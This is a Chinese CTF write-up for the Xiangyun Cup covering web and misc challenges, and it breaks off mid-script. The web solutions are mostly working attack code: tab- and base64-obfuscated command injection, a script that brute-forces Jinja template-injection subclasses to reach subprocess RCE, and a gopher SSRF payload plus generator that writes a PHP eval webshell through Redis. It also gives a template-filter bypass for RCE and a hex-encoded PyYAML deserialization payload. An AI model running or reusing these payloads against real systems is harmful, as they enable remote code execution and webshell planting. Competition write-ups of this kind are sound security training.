祥云杯
Web
★sign
1%09||%09ls%09/
1%09||%09ca\t%09in\dex.p\hp时有个闪
1%09||find%09/%09-name%09`echo%09ZmxhKg==|base64%09-d`
找flag
1%09||ca\t%09/`echo%09L2V0Yy8uZmluZGZsYWcvZmxhZy50eHQ=|base64%09-d`
★flaskbot
写名字
发现要绕float,直接nan绕过
发现cookie,base64解码就是刚刚输的用户名
随便改一个用户名
输入什么输出什么,那我直接模板注入
读文件报错debug发现是python2的东西,然后一直翻资料,后来翻到之前写的一道题https://blog.csdn.net/SopRomeo/article/details/108985950
发现有这个类
那不直接原题芜湖起飞,跑个索引
import requestsimport base64import timeimport htmldata={'num':'nan'}header={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}for i in range(0,300):time.sleep(0.06)url='http://eci-2zechif0ewh08bt6v1jm.cloudeci1.ichunqiu.com:8888/guess'payload="{ {\'\'.__class__.__mro__[2].__subclasses__()[%s]}}" % ipayload = base64.b64encode(bytes(payload,encoding='utf-8'))cookie={'user':str(payload,encoding='utf-8')}r = requests.post(url,headers=header,data=data,cookies=cookie)text=html.unescape(r.text)print(text)if "subprocess.Popen" in text:print('------------------------------------------------------------------\n\n')print(html.unescape(r.text))print(i)break
直接RCE
{ {''.__class__.__mro__[2].__subclasses__()[258]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}
发现flag
过滤了flag,字符拼接绕
{ {''.__class__.__mro__[2].__subclasses__()[258]('cat /super_secret_fla'+'g.txt',shell=True,stdout=-1).communicate()[0].strip()}}
★doyouknowssrf
https://my.oschina.net/u/4593189/blog/4646830
Bypass SSRF
http://eci-2zefxwpkl0ky0qxw9jp1.cloudeci1.ichunqiu.com/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http%253A%252F%252F127.0.0.1%253A6379%252F_*1%250D%250A%25248%250D%250Aflushall%250D%250A*3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval(%2524_GET%255B%2522cmd%2522%255D)%253B%253F%253E%250A%250A%250D%250A*4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%252Fvar%252Fwww%252Fhtml%250D%250A*4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A*1%250D%250A%25244%250D%250Asave%250D%250A生成打内网redis的脚本:
import urllibprotocol="gopher://"ip="127.0.0.1"port="6379"shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"filename="shell.php"path="/var/www/html"passwd=""cmd=["flushall","set 1 {}".format(shell.replace(" ","${IFS}")),"config set dir {}".format(path),"config set dbfilename {}".format(filename),"save"]if passwd:cmd.insert(0,"AUTH {}".format(passwd))payload=protocol+ip+":"+port+"/_"def redis_format(arr):CRLF="\r\n"redis_arr = arr.split(" ")cmd=""cmd+="*"+str(len(redis_arr))for x in redis_arr:cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")cmd+=CRLFreturn cmdif __name__=="__main__":for x in cmd:payload += urllib.quote(redis_format(x))print payload
生成shell.php后,执行命令获得flag
★easygogogo
拿到题目,发现能上传任意文件,但并不解析,并且上传的文件名并不会更改,并且数据是保存在cookie里面生成的
于是尝试,修改cookie任意文件读取,但发现并不行,后来看到每个容器中的cookie相同,于是在第一个容器生成 ../../../../../../../flag 的cookie,在重启起一个容器,修改cookie,成功任意文件读取,拿到flag
★easyzzz
百度了一下,发现有很多历史漏洞,找到了网站/admin539,发现尝试爆破无果,也没找到可注入的点,那么前端可getshell的地方就更少了
参考文章:https://www.anquanke.com/post/id/173991,在文章中提到/search这个接口存在rce,于是尝试了一下,发现if被ban了,尝试绕过,在该框架中找到了一种模版的方式,进行绕过 {cutpic:}
成功执行命令,payload如下:
{i{cutpic:}f:(print(cat /flag))}{end i{cutpic:}f}
★profile system
测试发现存在目录穿越
审计后猜测应该是yaml处存在漏洞,参考链接如下:
https://github.com/yaml/pyyaml/issues/420
利用pyyaml漏洞,打一波远程,题目无回显,所以需要将输出重定向,这里将payload16进制编码一下,防止正则匹配
payload如下:
!!python/object/new:tuple- !!python/object/new:map- !!python/name:eval- [ "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x22\x6f\x73\x22\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x22\x2f\x72\x65\x61\x64\x66\x6c\x61\x67\x20\x3e\x20\x75\x70\x6c\x6f\x61\x64\x73\x2f\x32\x2e\x74\x78\x74\x22\x29" ]
另外,还需伪造cookie进入判断条件:
if session['priviledge'] =='elite' and os.path.isfile(realpath):
简单伪造一下,上传文件,构造cookie,写入uploads/目录下,拿到flag
Misc
★签到
base64:ZmxhZ3txcV9ncm91cF84MjY1NjYwNDB9
解密即得flag{qq_group_826566040}
★xixixi
磁盘内所有内容如下:(可用winhex直接复原
)
# !i.pyimport structfrom xixi import FAT32Parserfrom xixixi import Padding, picDepartListdef EncodePieces():global clusterListres = []Range = len(picDepartList) # 58# GetRandomClusterList(n) - Generate a random cluster list with length nclusterList = GetRandomClusterList(Range)for i in range(Range):if i != Range - 1:newCRC = struct.pack("
# !ixi.pyimport structclass FAT32Parser(object):def __init__(self, vhdFileName):with open(vhdFileName, 'rb') as f:self.diskData = f.read()self.DBR_off = self.GetDBRoff()self.newData = ''.join(self.diskData)def GetDBRoff(self):DPT_off = 0x1BEtarget = self.diskData[DPT_off+8:DPT_off+12]DBR_sector_off, = struct.unpack("
分析两个文件,可以得出:
!ixi.py中的类FAT32Parser,可以对磁盘进行一系列操作。!i.py中的文件是对文件进行分块儿处理,并且图片被分为了58块儿,除了第一块儿未被加密外,其余块儿都进行了如下处理:
①每块儿的最后四位,即CRC校验值被替换成了下一块儿所在的簇号。
②除第一块儿外,其余块儿的内容都会与该块儿的簇号 & 0xFE整体进行异或。
所以想要反解图片块儿,需要对每个块儿先进行异或解密,再查看后四位得到下一块儿的簇号。
# -*- coding: utf-8 -*-# @Project: Hello Python!# @File : exp# @Author : Tr0jAn # @Date : 2020-11-22import structimport binasciifrom xixi import FAT32Parserdef read(n):global keybinary = b''for i in vhd.read(n):binary += (i ^ (key & 0xFE)).to_bytes(length=1, byteorder='big', signed=False)return binaryFAT = FAT32Parser("new.vhd")vhd = open("new.vhd", "rb")vhd.seek(0x27bae00) # 定位磁盘中图片位置flag = open("flag.png", "wb")flag.write(vhd.read(8)) # 写入png头key = 0while True:d = read(8)length, cType = struct.unpack(">I4s", d)print(length, cType) # length为